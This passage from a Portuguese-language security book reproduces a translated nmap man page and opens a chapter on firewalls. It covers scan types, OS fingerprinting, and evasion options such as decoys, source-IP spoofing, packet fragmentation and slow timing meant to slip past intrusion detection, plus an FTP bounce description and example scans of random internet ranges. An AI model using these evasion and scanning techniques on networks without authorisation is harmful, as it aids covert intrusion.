analisar as portas e analisar as vulnerabilidades encontradas nas
portas.
Os melhore são: Security Shadow Scan, Simpsons, Stealth Scan.
Os dois protocolos possuem inúmeras falhas, porém o ftp é muito
interessante por ser um dos protocolos existente que possui uma
complexibilidade muito grande em relação aos outros protocolos.
Por ser tão complicado ele acaba possuindo muitos erros, mas são
um pouco mais difíceis de serem encontrados e algumas vezes
sendo um pouco complicado utilizar essas falhas, por isso há um
capítulo a respeito do FTP.
Muitos desses scans possuem up-date atualizando sua lista de
erros a serem procurados nos sistemas a serem scanneados, então
sempre que um novo erro é encontrado o scan fica sabendo através
de suas atualizações.

13.8 Analisando Firewalls

Os firewalls são alvo de muitos testes, pois como é este


aplicativo que tenta proteger o sistema, sendo que, se for
Terrorismo Tecnológico 221
Aprenda Para Sobreviver

descobertos falhas de proteção e implementação será fácil derrubar


toda uma rede.
A maior parte dos scanners para firewall envia vários tipos de
pacotes de informações para ver quais o firewall barra e quais ele
permite passar por sua barreira, assim ao ser descoberta a maneira
dele lidar com os pacotes poderá ver como o firewall está
trabalhando e para onde está enviando estes pacotes. Isto acontece
principalmente com administradores que não fazem atualizações.
Com certas informações fica fácil saber qual o tipo de invasão em
que o hacker deverá trabalhar para conseguir resultados eficientes.
Shadow Scan é um bom scan para firewalls.

13.9 Scan em Linux

O nmap é uma ótima ferramenta para scannear redes, ele tem como
função ver os computadores que estão ativos e quais serviços estão
sendo fornecidos.
Uma versão pode ser obtida em http://www.insecure.org/nmap/ e
como a versão é aberta o código pode ser obtido em:
ftp://ftp.ee.lbl.gov/libpcap.tar.z

Este é um software livre e pode ser copiado distribuído, modificado


enfim pode ser feito tudo dentro dos termos de Licença Pública
Geral GNU como publicado pelo Free Software Foundation;

Hackers em geral como gostam muito de usar os Linux acabam por


usar esta ferramenta, pois o Nmap faz uma topologia muita bem
feita e demonstrada da rede que ele irá atacar. Versões antigas do
software, anteriores a versão 2.0, são bem ruins já que ou travavam
o micro do hacker ou davam uma pane em algum nó da rede muitas
vezes chegando a tirar a rede que estava sendo scanneada do ar.
Terrorismo Tecnológico 222
Aprenda Para Sobreviver

(As informações foram tiradas do próprio site da NMAP)


(Nmap network security scanner man page)
Tradução: Antônio Pires de Castro Jr

-sT

TCP connect() scan: Esta é a mais básica forma de


TCP scanning. A chamada de sistema, connect(),
provida pelo seu sistema operacional é usada para
abrir uma conexão para toda porta interessante na
máquina. Se a porta está no estado listening, con
nect() irá ter sucesso, por outro lado a porta não
será alcançada. Uma grande vantagem desta técnica é
que você não precisa de nenhum privilégio especial.
Qualquer usuário em UNIX está livre para usar esta
chamada.

Este tipo de scan é facilmente detectável pelo log


do host alvo, o qual mostrará o grupo de conexões e
mensagens de erro para os serviços os quais
aceitam, accept(), a conexão somente para tê-la
imediatamente desligada.

-sS

TCP SYN scan: Esta técnica é muito conhecida como


"half-open" scanning, porque não abre uma conexão
TCP completa. É enviado um pacote com o flag SYN
setado, como se fosse abrir uma conexão real e é
esperado pela resposta. Uma resposta SYN/ACK indica
que a porta está no estado listening. O flag RST é
uma indicação de estado não listening. Se o flag
SYN/ACK é recebido, o flag RST é imediatamente
enviado para encerrar a conexão (atualmente o
Terrorismo Tecnológico 223
Aprenda Para Sobreviver

núcleo do SO faz isso por nós). A principal vantagem


tagem desta técnica de scanning é que poucos sites
irão registra-lá no arquivo de log. Desafortunada
mente é necessário privilégios de super usuário
(root) para construir estes pacotes SYN customiza
dos.

-sF -sX -sN

Modos Stealth FIN, Xmas Tree, ou Null scan: Algumas


vezes nem mesmo a técnica SYN scanning é clandes
tina suficiente. Vários firewalls e filtros de
pacotes observam por SYNs para portas restritas, e
programas como Synlogger e Courtney estão
disponíveis para detectar este tipo de scan. Por
outro lado, scans avançados (stealth FIN, Xmas
Tree, ou Null scan), podem ser capazes de passar
através destes filtros sem serem molestados.

A idéia é que portas fechadas são exigidas por


responder aos pacotes de teste com um RST, enquanto
portas abertas precisam ignorar os pacotes em
questão (veja RFC 793 pp 64). A técnica de scan FIN
utiliza o limitado pacote FIN como teste, enquanto
a técnica de scan Xmas Tree seta os flags FIN, URG
e PUSH. A técnica de scan Null não seta nenhum
flag. Desafortunadamente a Microsoft (como usual)
decidiu completamente ignorar o padrão e faz as
coisas do seu próprio jeito. Então este tipo de
scan não funcionará contra sistemas executando Win
dows95/NT. Do lado positivo, está é uma ótima
maneira de distinguir entre duas plataformas. Se o
scan encontrar portas abertas, é possível saber que
a máquina não utiliza o Windows. Se as técnicas de
scan -sF, -sX ou -sN mostram todas as portas
fechadas, mesmo assim a técnica de scan SYN (-sS)
mostra portas sendo abertas, você poderá estar
Terrorismo Tecnológico 224
Aprenda Para Sobreviver

olhando para uma máquina Windows. Esta é a maneira


menos usada pelo nmap para testar a detecção do SO.
Exitem, também, alguns outros sistemas que são
descobertos da mesma maneira que descobrimos o win
dows. Estes incluem Cisco, BSDI, HP/UX, MVS, and
IRIX. Todos acima enviam resets (RST) de portas
abertas quando estes devem, somente, descartar o
pacote.

-sP

Ping scanning: Algumas vezes você somente quer


saber quais os hosts da rede estão ativos. O Nmap
pode fazer isso enviando um pacote de requisição
ICMP (ICMP echo request) para todo endereço IP
especificado da rede. Os hosts que respondem estão
vivos. Desafortunadamente, vários sites, como a
microsoft.com, bloqueiam pacotes de requisição ICMP
(echo request). Então, o nmap pode, também, enviar
um pacote ACK TCP para (por definição) a porta 80.
Se nós pegarmos o flag RST novamente, a máquina
esta viva. A terceira técnica envolve o envio de
pacotes SYN e a espera pelo pacote com o flag RST
ou os flags SYN/ACK. O método connect() é usado por
usuários comuns (não root).

Por definição (para super usuários), o nmap usa


tanto as técnicas do ICMP e a do flag ACK em par
alelo. Você pode mudar as -P opções descritas mais
a frente.

Note que o ping, por definição, é feito de qualquer


forma, e somente os hosts que respondem são scan
neados. Somente use esta opção se você desejar vas
culhar sem fazer qualquer scan real de portas.

-sU
Terrorismo Tecnológico 225
Aprenda Para Sobreviver

UDP scans: Este método é usado para determinar


quais portas UDP (User Datagram Protocol, RFC 768)
estão abertas no host. A técnica implica em enviar
0 bytes de dados de pacotes UDP para cada porta da
máquina alvo. Se nós recebermos uma mensagem de
ICMP port unreachable (porta ICMP não alcançada),
então a porta está fechada. Por outro lado nós
assumimos que a porta está aberta.

Várias pessoas pensam que a técnica UDP scanning é


supérfluo. Eu, usualmente, lembro desta como uma
recente falha no rpcbind do Solaris. O Rpcbind pode
ser encontrado escondido em uma porta UDP não docu
mentada em algum lugar acima de 32770. Então não
importa que a porta 111 esteja bloqueada por um
firewall. Porém, você pode encontrar quais as por
tas altas, maiores de 30.000, que estão no estado
listening? Com o scanner UDP você pode! Existe,
também, o programa cDc Back Orifice backdoor o qual
se oculta em uma porta UDP configurável em máquinas
Windows. Alguns serviços comumente vulneráveis que
utilizam o UDP são: snmp, tftp, NFS, etc.

Desafortunadamente UDP scanning é algumas vezes,


dolorosamente, vagarosa desde que a maioria dos
hosts implementam a sugestão da RFC 1812 (seção
4.3.2.8) de limitar a taxa de mensagens de erro
ICMP. Por exemplo, o núcleo do Linux (em
net/ipv4/icmp.h) limita a geração de mensagens de
destination unreachable para 80 por 4 segundos, com
1/4 segundos de penalidade se esta for excedida. O
Solaris tem um limite muito mais restrito (mais ou
menos 2 mensagens por segundo) e assim gasta um
tempo maior para realizar o scan. Nmap detecta
esta taxa limitante e reduz conformemente, por
outro lado inunda a rede com pacotes sem uso que
Terrorismo Tecnológico 226
Aprenda Para Sobreviver

irão ser ignorados pela máquina alvo.

Como é típico, a Microsoft ignorou a sugestão da


RFC e não parece ter feito nenhuma taxa limitante
por completo no Win95 e no NT. Então é possível
scannear, rapidamente , todas as portas de 64K das
máquinas windows. Beleza!

-sO

Scan do Protocolo IP: Este método é usado para


determinar quais protocolos IPs são usados no host.
A técnica consiste em enviar pacotes IP raw sem
promover nenhum cabeçalho para cada protocolo
específico na máquina alvo. Se nós recebermos uma
mensagem do protocolo ICMP unreachable, então o
protocolo não está sendo usado. Por outro lado nós
assumimos que está aberto. Note que vários hosts
(AIX, HP-UX, Digital UNIX) e firewalls podem não
enviar mensagens de protocolo unreachable. Assim
faz parecer que todos os protocolos estão "aber
tos".

Isso porque a técnica implementada é muito similar


ao scanning da porta UDP, onde a taxa limite de
ICMP pode ser aplicada também. Porém o campo do
protocolo IP tem somente 8 bits, então no máximo
256 protocolos podem ser testados, os quais devem
ser possíveis de serem testados em tempo razoável.

-sA

ACK scan: Este método avançado é usualmente usado


para mapear o conjunto de regras de um firewall. Em
particular, esta pode ajudar a determinar quando um
firewall é stateful ou somente um filtro de pacotes
simples que bloqueia pacotes SYN de chegada.
Terrorismo Tecnológico 227
Aprenda Para Sobreviver

Este tipo de scan envia pacotes com o flag ACK


setado para uma porta específica. Se um RST voltar,
a porta é classificada como "não filtrada". Se não
voltar nada ou um ICMP unreachable voltar, a porta
é classificada como "filtrada". Note que o nmap
usualmente não imprime portas "não filtradas",
obtendo, assim, nenhuma porta mostrada na saída é
usualmente um sinal que todos os testes foram
suscedidos (e retornado RSTs). Esta técnica de scan
nunca irá, obviamente, mostrar portas no estado
"aberto".

-sW

Window scan: Este scan avançado é muito similar ao


ACK scan, exceto que as vezes pode ser possível
detectar portas abertas mesmo sendo filtradas, isso
devido a anomalia do tamanho da janela TCP repor
tado por vários sistemas operacionais. Sistemas
vulneráveis para isso incluem no mínimo várias
versões do AIX, Amiga, BeOS, BSDI, Cray, Tru64
UNIX, DG/UX, OpenVMS, Digital UNIX, FreeBSD, HP-UX,
OS/2, IRIX, MacOS, NetBSD, OpenBSD, OpenStep, QNX,
Rhapsody, SunOS 4.X, Ultrix, VAX, and VxWorks.
Vejam no arquivo, na lista de discussão nmap-hack
ers, a lista completa.

-sR

RPC scan. Este método trabalha em combinação com


várias técnicas de scan de portas do Nmap. Ele pega
todas as portas TCP/UDP encontradas abertas e
inunda elas com comandos NULL de programas SunRPC
numa tentativa de determinar quando elas são portas
RPC, e se são, qual programa e versão dos serviços.
Com este método você pode efetivamente obter a
Terrorismo Tecnológico 228
Aprenda Para Sobreviver

mesma informação como se usasse 'rpcinfo -p' mesmo


se o portmapper alvo estiver atrás de um firewall
(ou protegido pelo TCP wrappers). Decoy não tra
balha correntemente com RPC scan, em algum ponto eu
posso adicionar o suporte decoy para UDP RPC scans.

-b <ftp relay host>

FTP bounce attack: Uma interessante "carac


terística" do protocolo ftp (RFC 959) é sustentada
para conexões ftp "proxy". Em outras palavras, eu
devo ser capaz de conectar do evil.com para um
servidor FTP, target.com, e requerer que o servidor
envie um arquivo para qualquer lugar na internet!
Isto pode ter sido explorado bem em 1985 quando a
RFC foi escrita. Porém na internet hoje, nós não
podemos ter pessoas hijacking servidores ftp e req
uisitando que os dados sejam jogados para
arbitrários pontos na internet. Como *Hobbit*
escreveu em 1995, este protocolo torna inútil "pode
ser usado para portar virtualmente não deter
mináveis emails ou news, forjando em servidores
vários sites, preenchendo discos, tentando saltar
firewalls, e geralmente sendo aborrecido, ficando,
assim, difícil seguir a pista ao mesmo tempo." O
que nós iremos explorar disto é o scan de portas
TCP do servidor "proxy" de ftp. Então você pode
conectar a um servidor ftp atrás do firewall, e
então scannear portas que estão mais provávelmente
bloqueadas (139 é uma boa). Se o servidor ftp per
mitir ler de e escrever para algum diretório (como
/incoming), você pode enviar dados arbitrários para
portas que você achar abertas (nmap não faz isso
por você).

Os argumentos passados para a opção 'b' é o host


Terrorismo Tecnológico 229
Aprenda Para Sobreviver

que você quer usar como proxy, na notação de padrão


URL. O formato é: username:password@server:port.
Tudo, menos o server é opcional. Para determinar
quais servidores são vulneráveis para este ataque,
você pode ver meu artigo em Phrack 51. A versão
atualizada está disponível em nmap URL
(http://www.insecure.org/nmap).

-P0

Pinga os hosts antes de scanneá-los. Isto permite


scannear as redes que não permitem ICMP echo
requests (ou responses) através dos seus firewalls.
microsoft.com é um exemplo desta rede, e então você
deve sempre usar -P0 ou -PT80 quando portscanning
microsoft.com.

-PT

Use TCP "ping" para determinar quais hosts estão


ativos. Ao invez de enviar pacotes ICMP echo
request e esperar pelas respostas, nós enviamos
pacotes TCP ACK por toda parte na rede alvo (ou
para uma simples máquina) e então esperamos por
respostas. Hosts que estão ativos devem responder
com um RST. Esta opção preserva a eficiência de
somente scannear hosts que estão ativos, enquanto
ainda permite scannear redes/hosts que bloquearam
pacotes ping. Para usuários não root, é usado o
connect(). Para setar a porta destino dos pacotes
de teste usem -PT<número da porta>. A porta default
é 80, desde que está porta é muitas vezes não fil
trada.

-PS
Terrorismo Tecnológico 230
Aprenda Para Sobreviver

Está opção usa pacotes com SYN (connection request)


ao invez de pacotes com ACK para usuários root.
Hosts que estão ativos devem responder com RST (ou,
raramente, um SYN|ACK).

-PI

Está opção usa um pacote ping verdadeiro (ICMP echo


request). Esta encontra os hosts que estão ativos e
também procura por um endereço de broadcast para a
subrede da sua rede. Estes são endereços IPs que
são externamente alcançáveis e traduzidos para
broadcast de pacotes IP de chegada para uma subrede
de computadores. Estes devem ser eliminados se
encontrado, como ele permitem por númerosos ataques
de negação de serviço (DoS) (Smurf é o mais comum).

-PB

Este é o tipo de ping default. Ele usa tanto


pacotes com ACK ( -PT ) e pacotes ICMP ( -PI )
sweeps em paralelo. Desta maneira você pode obter
os firewalls que filtram cada uma (porém não
ambas).

-O

Esta opção ativa a identificação de hosts remotos


via TCP/IP fingerprinting. Em outras palavras, ela
usa uma grande quantidade de técnicas para detectar
sutilezas na pilha de rede do sistema operacional
do computador que você está scanneando. Ele usa
estas informações para criar a 'fingerprint' a qual
é comparada com sua base de dados de conhecidos
Terrorismo Tecnológico 231
Aprenda Para Sobreviver

fingerprints de SOs (o arquivo nmap-os-finger


prints) para decidir qual o tipo de sistema que
você está escanneando.

Se o Nmap está desabilitado para resolver o SO da


máquina, e as condições são boas (ex. ao menos uma
porta aberta), Nmap irá prover a URL que você pode
usar para submeter a fingerprint se você conhecer
(com certeza) o SO sendo executado na máquina. Por
fazer isso você contribui para o conjunto de sis
temas operacionais conhecidos pelo nmap e então
será mais correto para todos.

A opção -O também possibilita classificar e fazer o


prognostico da sequência TCP. Esta é uma medida que
descreve aproximadamente qual a dificuldade em
estabelecer uma conexão TCP forjada contra um host
remoto. Esta é útil para explorar o IP de origem
baseado na relação de confiança (rlogin, firewall
filters, etc) ou por esconder a origem do ataque. O
número difficulty mostrado é baseado em uma simples
amostra estatística e pode variar. Este número é
geralmente melhor apresentado como uma frase em
Inglês como "worthy challenge" ou "trivial joke".

-I

Esta ativa o scanning do ident reverso TCP. Como


notado por Dave Goldsmith em 1996 na mensagem para
a Bugtraq, o protocolo ident (rfc 1413) permite
revelar o username dos donos dos processos conecta
dos via TCP, mesmo se estes processos não iniciaram
a conexão. Então você pode, por exemplo, conectar a
porta http e então usar o identd para encontrar
Terrorismo Tecnológico 232
Aprenda Para Sobreviver

quando o servidor está sendo executado como root.


Isto pode somente ser feito com uma conexão TCP
completa para a porta alvo (ex.: a opção de scan
ning -sT). Quando -I é usada, o identd do host
remoto é pesquisado para cada porta aberta encon
trada. Obviamente isso não funciona se o host não
estiver rodando o identd.

-f

Esta opção requere os flags SYN, FIN, XMAS, ou NULL


scan para usar cuidadosos pacotes IP fragmentados.
A idéia é dividir o cabeçalho TCP sobre vários
pacotes para ficar difícil para o filtro de
pacotes, sistemas de detecção de intrusão, e outros
aborrecimentos para detectar o que você está
fazendo. Seja cuidadoso com isso! Vários programas
tem preocupações lidando com estes cuidadosos
pacotes. Enquanto este método não obtem pacotes
filtrados e firewalls que enfileram todos os frag
mentos IP (como a opção
CONFIG_IP_ALWAYS_DEFRAG no
kernel do linux), várias redes não conseguem asse
gurar o golpe de performance que este fato causa,
então é melhor deixar este desabilitado.

Note que esta opção, ainda, não esta funcionando em


todos os sistemas. Esta funciona bem para o Linux,
FreeBSD, e OpenBSD e outras pessoas tem reportado
sucessos com outras variações *NIX.

-v

Modo Verbose. Esta é uma opção altamente recomen


dada e fornece mais informações sobre o que esta
acontecendo. Você pode usá-la duas vezes para um
melhor efeito. Use -d em conjunto se você realmente
Terrorismo Tecnológico 233
Aprenda Para Sobreviver

quiser ficar louco com a quantidade de informações


na tela!

-h

Esta cômoda opção mostra uma rápida tela de


referência das opções usadas no nmap. Como você
deve ter notado, está man page não é exatamente uma
'rápida referência' :o)

-oN <logfilename>

Este log mostra o resultado do seu scan em uma


forma humanamente legível no arquivo que você
especificou como argumento.

-oX <logfilename>

Este log mostra o resultado do seu scan na forma de


XML no arquivo que você especificou como argumento.
Isto permite aos programas facilmente capturar e
interpretar os resultados do Nmap. Você pode
fornecer o argumento ´-´(sem quotas) para colocar
em uma stdout (para shell pipelines, etc). Neste
caso uma saída normal será suprimida. Tomar cuidado
para as mensagem de erro se você esta usando esta
(elas, ainda, irão para stderr). Também, note que
´-v´ pode causar algumas informações extras para
ser impressas.

-oG <logfilename>

Este log mostra o resultado do seu scan na forma do


grepable no arquivo que você especificou como argu
Terrorismo Tecnológico 234
Aprenda Para Sobreviver

mento. Este simples formato provê todas as


informações em uma linha (então você pode facil
mente usar o grep para portas ou obter informações
de SOs e ver todos os endereços IPs). Este é o
mecanismo preferido pelos programas para interagir
com o Nmap, porém agora é recomendado usar a saída
em XML (-oX). Este simples formato pode não conter
tantas informações quanto os outros formatos. Você
pode fornecer o argumento ´-´(sem quotas) para
colocar em uma stdout (para shell pipelines, etc).
Neste caso uma saída normal será suprimida. Tomar
cuidado para as mensagem de erro se você esta
usando esta (elas, ainda, irão para stderr).
Também, note que ´-v´ irá fornecer várias
informações extras para ser impressas.

-oS <logfilename>

thIs l0gz th3 r3suLtS of YouR ScanZ iN a s|<ipT


kiDd|3 f0rM iNto THe fiL3 U sPecfy 4s an arGuMEnT!
U kAn gIv3 the 4rgument ´-´ (wItHOUt qUOteZ) to
sh00t output iNT0 stDouT!@!!

--resume <logfilename>

O scan de rede que é cancelado devido a um control-


C, interrupção da rede, etc. pode ser resumido
usando esta opção. O logfilename precisa ser normal
(-oN) ou parsable na máquina (-oM) para registrar o
scan abortado. Nenhuma outra opção pode ser usada.
Nmap começará na máquina depois que a última foi
scanneada com sucesso e armazenada no arquivo de
log.
Terrorismo Tecnológico 235
Aprenda Para Sobreviver

-iL <inputfilename>

É feita a leitura de um arquivo alvo especificado


na linha de comando. O arquivo deve conter uma
lista de hosts ou expressões de rede separados por
espaços, tabs, ou novas linhas. Use o hífen (-)
como inputfilename se você quisesse que o nmap leia
expressões do hosts de stdin (como no final do
pipe). Veja a seção especificação do alvo para
maiores informações nas expressões que você
preencherá no arquivo.

-iR

Esta opção fala para o Nmap para gerar seus


próprios hosts para scannear, usando simplesmente
números randomicos :o). Isso nunca irá terminar.
Isso pode ser muito útil para tirar amostras
estatísticas da internet para estimar várias
coisas. Se você nunca estiver realmente entediado,
tente nmap -sS -iR -p 80 para encontrar vários
servidores web para observar.

-p <port ranges>

Esta opção especifica quais portas você quer para


descrever. Por exemplo '-p 23' irá tentar somente a
porta 23 do host(s) alvo. ´-p 20-30,139,60000-´ irá
scannear portas entre 20 e 30, porta 139, e todas
as portas maiores que 60000. Por definição é para
scannear todas as portas entre 1 e 1024 tão bem
quanto qualquer porta listada no arquivo de
serviços o qual vem com o nmap. Para o scan de pro
tocolos IP (-sO), especifica o número do protocolo
Terrorismo Tecnológico 236
Aprenda Para Sobreviver

que você deseja para (0-255).

-F Modo de scan rápido.

Especifica que você somente deseja scannear por


portas catalogadas no arquivo services o qual vem
com o nmap (ou o arquivo de protocolos para -sO).
Este é obviamente muito mais rápido do que scannear
todas 65535 portas no host.

-D <decoy1 [,decoy2][,ME],...>

O processo de decoy scan será executado fazendo ele


mostrar-se para o host remoto que o(s) host(s) que
você especificou como decoys estão scanneando a
rede alvo também. Então seus IDS precisarão repor
tar 5-10 scan de portas de um único endereço IP,
porém eles não saberão qual o endereço IP que os
estava scanneando e quais eram os decoys inocentes.
Enquanto isto pode ser descoberto através de uma
rota, respostas soltas, e outras mecanismos ativos,
este é geralmente uma técnica extremamente efetiva
para esconder seu endereço IP.

Separando cada decoy host com vírgulas, você pode


usar opcionalmente 'ME' como um dos decoys para
representar a posição que você quer seu endereço IP
para ser usado. Se você colocar 'ME' na sexta
posição ou outra maior, várias detectores comuns de
scan de portas não serão razoáveis para mostrar seu
endereço IP por completo. Se você não usar 'ME', o
nmap irá colocar você em uma posição randomica.

Note que os hosts que você usa como decoys devem


estar ativos ou você precisará acidentalmente inun
Terrorismo Tecnológico 237
Aprenda Para Sobreviver

dar com pacotes SYN seu alvo. Também, ele será


muito fácil para determinar quais hosts estão scan
neando se somente um está atualmente ativo na rede.
Você deverá querer usar o endereço IP ao invez de
nomes (então redes decoy não irão ver você em seus
nameserver logs).

Também, note que vários (estúpidos) "detectores de


scan de portas" irão firewall/deny roteamento para
hosts que tentam fazer o scan de portas. Então você
precisa descuidadosamente causar a perda de conexão
da máquina que você está scanneando com a máquina
decoy que você esta usando. Isto pode causar
maiores problemas para a máquina alvo se o decoy
está sendo usado, digo, seu internet gateway ou até
"localhost". Então você pode querer ser cuidadoso
com esta opção. A real moral da história é que os
detectores de scan de portas spoofable não devem
gastar ações contra a máquina que parece estar
scanneando suas portas. Este pode ser somente um
decoy, ou seja, uma isca, uma armadilha!

Decoys são usados tanto em ping scan inicial


(usando ICMP, SYN, ACK, ou o que seja) e durante a
fase de atual scanneamento de porta. Decoy são
também usados durante a detecção remota de SO ( -O
).

Este é um digno registrador que usa vários decoys


que podem atrasar seu scan e potencialmente até
fazer este menos preciso. Também, vários ISPs fil
tram pacotes spoofed, embora vários (correntemente
a maioria) não restrigem pacotes IP spoofed por
inteiro.

-S <IP_Address>
Terrorismo Tecnológico 238
Aprenda Para Sobreviver

Em várias circunstâncias, nmap pode não ser capaz


de determinar seu endereço de origem ( nmap irá
avisá-lo se este é o caso). Nesta situação, use -S
com seu endereço IP (através da interface que você
deseja enviar pacotes).

Outro possível uso deste flag é para spoofar o scan


para fazer o alvo pensar que alguém mais está scan
neando. Imagine uma companhia sendo repetidamente
port scanned pelo seu competidor! Este não é um uso
suportado (ou o principal propósito) deste flag. Eu
penso somente que isso levanta uma interessante
discussão, em que as pessoas devem estar cientes
antes que elas acusem outras pessoas de estar scan
neando suas portas. -e geralmente será requerida
para este tipo de uso.

-e <interface>

Fala para o nmap qual interface enviar e receber


pacotes. Nmap deve ser capaz de detectar isto,
porém este contará para você se não puder.

-g <portnumber>

Conjunto de números de portas de origens usadas no


scan. Vários ingênuos firewalls e filtros de
pacotes instalados fazem uma exceção em seus con
juntos de regras para permitir pacotes DNS (53) ou
FTP-DATA (20) para entrar e estabelecer a conexão.
Obviamente isto contesta completamente as vantagens
de segurança do firewall desde que intrusos podem
somente mascarar como FTP ou DNS por modificar suas
portas de origem. Obviamente para UDP scan você
Terrorismo Tecnológico 239
Aprenda Para Sobreviver

deve tentar 53 primeiro e TCP scans devem tentar 20


antes da porta 53. Note que isso é somente uma req
uisição -- nmap honrará isso somente quando esta
estiver hábil para. Por exemplo, você não pode
amostrar todo TCP ISN de um host:porta para um
host:porta, então nmap muda a porta de origem mesmo
que seja usado -g.

Seja ciente que existe uma penalidade na perfor


mance em vários scans por usar esta opção, porque
eu algumas vezes armazeno informações úteis no
número da porta de origem.

-r

Fala para o Nmap para não randomizar a ordem na


qual as portas serão scanneada.

--randomize_hosts

Fala para o Nmap para embaralhar cada grupo acima


de 2048 hosts antes de scanneá-los. Isto pode fazer
o scan menos evidente para vários sistemas de moni
toração de rede, especialmente quando você combina
estes com as opções de baixo tempo (slow timing)
(veja abaixo).

-M <max sockets>

Conjunto máximo de números de sockets que será


usado em paralelo pelo TCP connect() scan (por
definição). Esta é útil para diminuir um pouco o
scan e anular a possibilidade de travar a máquina
remota. Outra aproximação é para usar -sS, a qual é
geralmente fácil para as máquinas descreverem.
Terrorismo Tecnológico 240
Aprenda Para Sobreviver

OPÇÕES DE TEMPO

Geralmente o Nmap faz um bom trabalho em ajustar


para as características da rede um tempo de
execução e scanning tão rápido quanto possível
enquanto minimiza as chances do hosts/portas serem
não detectadas. Entretanto, existem vários casos
onde a política de tempo default do Nmap pode não
encontrar seus objetivos. As seguintes opções
provêem um fino nível de controle sobre o tempo de
scan:

-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane>

Estas são políticas de tempo preservados para con


venientemente expressar suas prioridades para o
Nmap. Paranoid modo de scan muito lento na
esperança de prevenir a detecção pelo sistema IDS.
Este serializa todos os scans (scanning não par
alelo) e geralmente espera no mínimo 5 minutos
entre o envio de pacotes. Sneaky é similar, exceto
que somente espera 15 segundos entre o envio de
pacotes. Polite tem o significado para facilitar a
carga na rede e reduzir as chances de travar a
máquina. Ele serializa os testes e espera no mínimo
0.4 segundos entre eles. Normal é o comportamento
default do Nmap, o qual tenta executar tão rápido
quanto possível sem sobrecarregar a rede ou perder
hosts/portas. Aggressive esse modo adiciona um
timeout de 5 minutos por host e nunca espera mais
que 1.25 segundos para testar as respostas. Insane
é somente adequando para redes muito rápidas ou
onde você não se importa em perder algumas
Terrorismo Tecnológico 241
Aprenda Para Sobreviver

informações. Nesta opção o timeout dos hosts acon


tecem em 75 segundos e espera somente 0.3 segundos
por teste individual. Esta possibilita, de qualquer
forma, uma varredura extremamente rápida na rede
:o). Você pode também referenciar isso por números
(0-5). Por exemplo, ´-T 0´ fornece para você o modo
Paranoid e ´-T 5´ é o modo Insane.

Estes modos, para preservar o tempo, NÃO devem ser


usados em combinação com controles de baixo nível,
como os fornecidos abaixo.

--host_timeout <milliseconds>

Especifica a soma de tempo que o Nmap permite para


gastar scanneando um simples host antes de desistir
daquele IP. O modo de tempo default não tem o time
out do host.

--max_rtt_timeout <milliseconds>

Especifica a soma máxima de tempo do Nmap tem per


mitido para esperar pela resposta de teste antes de
retransmitir ou ocorrer um timeout de um particular
teste. O modo default seta este valor em 9000.

--min_rtt_timeout <milliseconds>

Quando um host alvo começa a estabelecer um padrão


de resposta muito rápido, Nmap irá contrair a soma
de tempo fornecida por teste. Isto aumenta a
velocidade do scan, porém pode levar a perder
pacotes quando a resposta gasta mais tempo que o
usual. Com este parâmetro você pode garantir que o
Terrorismo Tecnológico 242
Aprenda Para Sobreviver

Nmap irá esperar ao menos a soma de tempo fornecida


antes de abrir mão do teste.

--initial_rtt_timeout <milliseconds>

Especifica o timeout do teste inicial. Isto é


geralmente útil quando scanning firewalled hosts
com -P0. Normalmente o Nmap pode obter boas estima
tivas RTT do ping e dos primeiros testes. O modo
default usa 6000.

--max_parallelism <number>

Especifica o número máximo de Nmap scans permitidos


para serem performados em paralelo. Ajustando este
para 1 significa que o Nmap nunca irá tentar scann
ear mais que uma porta por vez. Este, também, afeta
outros scans paralelos como o ping sweep, RPC scan,
etc.

--scan_delay <milliseconds>

Especifica a mínima soma de tempo que o Nmap pre


cisa esperar entre testes. Este é, na maioria das
vezes, útil para reduzir a carga da rede ou para
diminuir a maneira de scan para esquivar-se do IDS.

nmap -v target.example.com

Esta opção faz o scan de todas as portas TCP reservadas na


máquina target.example.com. A opção -v significa ligar o
modo verbose.
Terrorismo Tecnológico 243
Aprenda Para Sobreviver

nmap -sS -O target.example.com/24

Lança um stealth SYN scan contra cada máquina que está


ativa, abrangendo todas as 255 máquinas de classe 'C' onde
target.example.com reside. Este exemplo, também, tenta
determinar o sistema operacional que esta executando em
cada host que esta ativo. Este requere privilégios de root
(super usuário) por causa da técnica SYN scan e da
detecção de SOs.

nmap -sX -p 22,53,110,143,4564 198.116.*.1-127

Envia um Xmas tree scan para a primeira metade de cada uma


das 255 possibilidades de subredes de 8 bit no espaço de
endereços classe 'B' em 198.116. Nós estamos testando
quando o sistema executa sshd, DNS, pop3d, imapd, ou a
porta 4564. Note que o Xmas scan não trabalha com a
Microsoft devido a sua deficiente pilha TCP. O mesmo acon
tece com CISCO, IRIX, HP/UX, e BSDI.

nmap -v --randomize_hosts -p 80 '*.*.2.3-5'

Em lugar de focar somente um específico IP, é interes


sante, algumas vezes, abranger um fatia de toda a internet
e fazer o scan de um pequena amostra de cada fatia. Este
comando encontra todos os servidores web em máquinas com
endereços IPs terminando em .2.3, .2.4, ou .2.5. Se você é
super usuário (root) você pode adicionar -sS. Também, você
irá encontrar mais máquinas interessantes começando com
127., então você pode querer usar '127-222' ao invez dos
primeiros asterísticos porque essa parte tem uma alta den
sidade de máquinas interessantes (IMHO).
Terrorismo Tecnológico 244
Aprenda Para Sobreviver

host -l company.com | cut '-d ' -f 4 | ./nmap -v -iL -

Fazer uma transferência de zona de DNS para encontrar


hosts em company.com e então alimentar os endereços IPs
para o nmap. Os comandos acima são para minha caixa
GNU/Linux. Você pode precisar de diferentes coman
dos/opções em outros sistemas operacionais.

Cuidado com testes!

Muitos administradores, donos de empresas e empregados e


até usuários domésticos, após terem feitos testes no seu
sistema ficam com a falsa impressão de segurança. Isto é muito
perigoso, pois alguns minutos depois de ter sido feito o teste,
algum funcionário pode ter, por exemplo, recebido um e-mail e
este, que estava infectado, abriu uma porta do sistema.

Claro que os testes devem ser utilizados porém muito


cuidado, pois absolutamente não são motivos para
despreocupação e sim somente mais uma arma que deve ser
utilizada para continuar a manutenção de segurança, que deve
ser continua sempre!
Terrorismo Tecnológico 245
Aprenda Para Sobreviver

Capítulo XIV

FireWalls – Funcionamento, e como burlar.


Terrorismo Tecnológico 246
Aprenda Para Sobreviver

14.1 Introdução

Firewalls são mecanismos utilizados para aumentar a segurança


de redes ligadas a Internet, espécies de barreira de proteção,
constituídas de um conjunto de hardware e software. Ele cria como
se fosse um muro com buracos, e dependendo do tipo de dados que
chega até ele deixa passar para dentro ou fora da rede ou o destrói.
Firewall é um sistema ou um grupo de sistemas que garante uma
política de controle de acesso entre duas redes geralmente entre a
